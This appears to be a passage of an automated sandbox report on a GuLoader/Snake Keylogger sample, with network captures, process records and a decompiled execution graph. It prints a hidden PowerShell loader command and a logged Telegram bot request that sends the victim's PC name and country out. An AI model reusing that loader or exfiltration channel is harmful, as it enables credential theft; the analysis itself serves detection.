                                                                                                                              2025-01-10 22:11:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.450010104.21.112.14433192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2025-01-10 22:11:30 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2025-01-10 22:11:30 UTC859INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:30 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 362
                                                                                                                              Connection: close
                                                                                                                              Age: 1861879
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              cf-cache-status: HIT
                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hfJmCIy5fx0tPjX1kF4JRWqzCuov1HE7rQyaAGvBxdTj7ACU%2BE1wWHMedwt7t1nu%2FMW%2B8inWi8pGLr8Gx%2BlCUIBSvcHa35kO1QmQLvvuaJ4pI57oerIB8KL9IoHec7Oxxqc3X%2F5x"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 900000d5cf76c34f-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1494&min_rtt=1474&rtt_var=592&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1787025&cwnd=181&unsent_bytes=0&cid=a53382a17dd2094d&ts=137&x=0"
                                                                                                                              2025-01-10 22:11:30 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.450012104.21.112.14433192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2025-01-10 22:11:32 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2025-01-10 22:11:32 UTC855INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:32 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 362
                                                                                                                              Connection: close
                                                                                                                              Age: 1861881
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              cf-cache-status: HIT
                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xk1bsH9gv0PKVtdovgETsMxgEKAmvoQf6SrXsaToCIRxslcXxKxQ0gTrivps4ctchFU%2F%2BktIwuLsXC6HIsbjIOBORAfJTZQZceRK0mymCbSHWvMY%2BDnOghPqSUDGhPdGSkoCmoHd"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 900000de5bd043b3-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1572&rtt_var=600&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1809169&cwnd=203&unsent_bytes=0&cid=f264b1f156e7eb12&ts=152&x=0"
                                                                                                                              2025-01-10 22:11:32 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.450014104.21.112.14433192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2025-01-10 22:11:33 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2025-01-10 22:11:33 UTC861INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:33 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 362
                                                                                                                              Connection: close
                                                                                                                              Age: 1861882
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              cf-cache-status: HIT
                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=44WeL21RS%2F9xWhNEw%2B%2BdBd2r8nnqxHzIEU9T5LNleYPNtNp6CC5YZK9XooiWShhozoaB%2BSMlOol0sIKYgIEBA%2BpQjcRyVBWWqO8Kn3ctUbG7mV%2FS6CRDQk840iuwyRUoAUcDlF98"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 900000e67ce5424b-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1612&rtt_var=623&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1811414&cwnd=248&unsent_bytes=0&cid=4d2ea3a3a1d70b18&ts=143&x=0"
                                                                                                                              2025-01-10 22:11:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              8192.168.2.450016104.21.112.14433192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2025-01-10 22:11:34 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2025-01-10 22:11:34 UTC853INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:34 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 362
                                                                                                                              Connection: close
                                                                                                                              Age: 1861883
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              cf-cache-status: HIT
                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PXbayfb%2BgM8dOFWy7GjHFGjPZsPx1isRF1nGr7xyEHdqMbE3EsGw52DRwdl8WxvouvWZlAo0adftlGEHrW%2F1JVk6M7W4OOZ6k3rtvElX6pZ8KpGMpEL7IG4jB2Sbds6st5nV5I0e"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 900000eed981424b-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1576&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1787025&cwnd=248&unsent_bytes=0&cid=cbedae779a360901&ts=137&x=0"
                                                                                                                              2025-01-10 22:11:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              9192.168.2.450018104.21.112.14433192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2025-01-10 22:11:36 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              2025-01-10 22:11:36 UTC857INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:36 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 362
                                                                                                                              Connection: close
                                                                                                                              Age: 1861885
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              cf-cache-status: HIT
                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RAqbkSSc7phM6Ng8HkHFpIUlIz1oSysv3HN20GYxRvQ9HPl4mvhcdgC6%2BQtErvZ0Omz0hnNzkbiSxVC3nO1W2LHW0uh0x%2FLeACc5Uyb%2B7jPC1%2BqXMfHNy0yTG2E3J6CFx9RRBLtZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 900000f6cc3643b3-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1572&rtt_var=600&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1809169&cwnd=203&unsent_bytes=0&cid=4b109997414fcbd9&ts=127&x=0"
                                                                                                                              2025-01-10 22:11:36 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              10192.168.2.450020104.21.112.14433192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2025-01-10 22:11:37 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2025-01-10 22:11:37 UTC860INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:37 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 362
                                                                                                                              Connection: close
                                                                                                                              Age: 1861886
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              cf-cache-status: HIT
                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2uWoVS3F3wI1P%2FeZuk8QQ7c2H5AVutp2rt1%2FlUZ3R9XtPvceiQlhJHNLS55HSS8omyvywrv6emwhS3H%2FVRaP%2FCPvmnlwQsEpQM6XDXW0UrN8Y16ncsjb%2BQ4gtcQTahDj%2BxzsV12N"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 900000fefeab43b3-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1630&rtt_var=971&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=950830&cwnd=203&unsent_bytes=0&cid=3873d05d7407eaf2&ts=133&x=0"
                                                                                                                              2025-01-10 22:11:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              11192.168.2.450021149.154.167.2204433192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2025-01-10 22:11:38 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:46:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                              Host: api.telegram.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2025-01-10 22:11:38 UTC344INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:38 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 55
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2025-01-10 22:11:38 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                              Click to jump to process

                                                                                                                              Click to jump to process

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Click to jump to process

                                                                                                                              Target ID:0
                                                                                                                              Start time:17:09:35
                                                                                                                              Start date:10/01/2025
                                                                                                                              Path:C:\Users\user\Desktop\4Vx2rUlb0f.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\4Vx2rUlb0f.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:779'915 bytes
                                                                                                                              MD5 hash:A1204C6A7FE28BAB5DB0E3240513A857
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:1
                                                                                                                              Start time:17:09:35
                                                                                                                              Start date:10/01/2025
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:powershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) "
                                                                                                                              Imagebase:0xa60000
                                                                                                                              File size:433'152 bytes
                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2706856166.000000000A8B3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:2
                                                                                                                              Start time:17:09:35
                                                                                                                              Start date:10/01/2025
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:7
                                                                                                                              Start time:17:11:04
                                                                                                                              Start date:10/01/2025
                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                              Imagebase:0xab0000
                                                                                                                              File size:59'904 bytes
                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3052249542.0000000025251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:23.9%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:21.2%
                                                                                                                                Total number of Nodes:1310
                                                                                                                                Total number of Limit Nodes:39
                                                                                                                                execution_graph 3650 402840 3651 402bbf 18 API calls 3650->3651 3653 40284e 3651->3653 3652 402864 3655 405c00 2 API calls 3652->3655 3653->3652 3654 402bbf 18 API calls 3653->3654 3654->3652 3656 40286a 3655->3656 3678 405c25 GetFileAttributesW CreateFileW 3656->3678 3658 402877 3659 402883 GlobalAlloc 3658->3659 3660 40291a 3658->3660 3663 402911 CloseHandle 3659->3663 3664 40289c 3659->3664 3661 402922 DeleteFileW 3660->3661 3662 402935 3660->3662 3661->3662 3663->3660 3679 403258 SetFilePointer 3664->3679 3666 4028a2 3667 403242 ReadFile 3666->3667 3668 4028ab GlobalAlloc 3667->3668 3669 4028bb 3668->3669 3670 4028ef 3668->3670 3671 403027 32 API calls 3669->3671 3672 405cd7 WriteFile 3670->3672 3676 4028c8 3671->3676 3673 4028fb GlobalFree 3672->3673 3674 403027 32 API calls 3673->3674 3677 40290e 3674->3677 3675 4028e6 GlobalFree 3675->3670 3676->3675 3677->3663 3678->3658 3679->3666 3680 401cc0 3681 402ba2 18 API calls 3680->3681 3682 401cc7 3681->3682 3683 402ba2 18 API calls 3682->3683 3684 401ccf GetDlgItem 3683->3684 3685 402531 3684->3685 3686 4029c0 3687 402ba2 18 API calls 3686->3687 3688 4029c6 3687->3688 3689 4029d4 3688->3689 3690 4029f9 3688->3690 3692 40281e 3688->3692 3689->3692 3694 405f97 wsprintfW 3689->3694 3691 406072 18 API calls 3690->3691 3690->3692 3691->3692 3694->3692 3300 401fc3 3301 401fd5 3300->3301 3302 402087 3300->3302 3320 402bbf 3301->3320 3304 401423 25 API calls 3302->3304 3311 4021e1 3304->3311 3306 402bbf 18 API calls 3307 401fe5 3306->3307 3308 401ffb LoadLibraryExW 3307->3308 3309 401fed GetModuleHandleW 3307->3309 3308->3302 3310 40200c 3308->3310 3309->3308 3309->3310 3326 406499 WideCharToMultiByte 3310->3326 3314 402056 3316 4051af 25 API calls 3314->3316 3315 40201d 3318 40202d 3315->3318 3329 401423 3315->3329 3316->3318 3318->3311 3319 402079 FreeLibrary 3318->3319 3319->3311 3321 402bcb 3320->3321 3322 406072 18 API calls 3321->3322 3323 402bec 3322->3323 3324 401fdc 3323->3324 3325 4062e4 5 API calls 3323->3325 3324->3306 3325->3324 3327 4064c3 GetProcAddress 3326->3327 3328 402017 3326->3328 3327->3328 3328->3314 3328->3315 3330 4051af 25 API calls 3329->3330 3331 401431 3330->3331 3331->3318 3695 4016c4 3696 402bbf 18 API calls 3695->3696 3697 4016ca GetFullPathNameW 3696->3697 3698 4016e4 3697->3698 3699 401706 3697->3699 3698->3699 3702 406393 2 API calls 3698->3702 3700 40171b GetShortPathNameW 3699->3700 3701 402a4c 3699->3701 3700->3701 3703 4016f6 3702->3703 3703->3699 3705 406050 lstrcpynW 3703->3705 3705->3699 3706 4014cb 3707 4051af 25 API calls 3706->3707 3708 4014d2 3707->3708 3709 40194e 3710 402bbf 18 API calls 3709->3710 3711 401955 lstrlenW 3710->3711 3712 402531 3711->3712 3713 4027ce 3714 4027d6 3713->3714 3715 4027da FindNextFileW 3714->3715 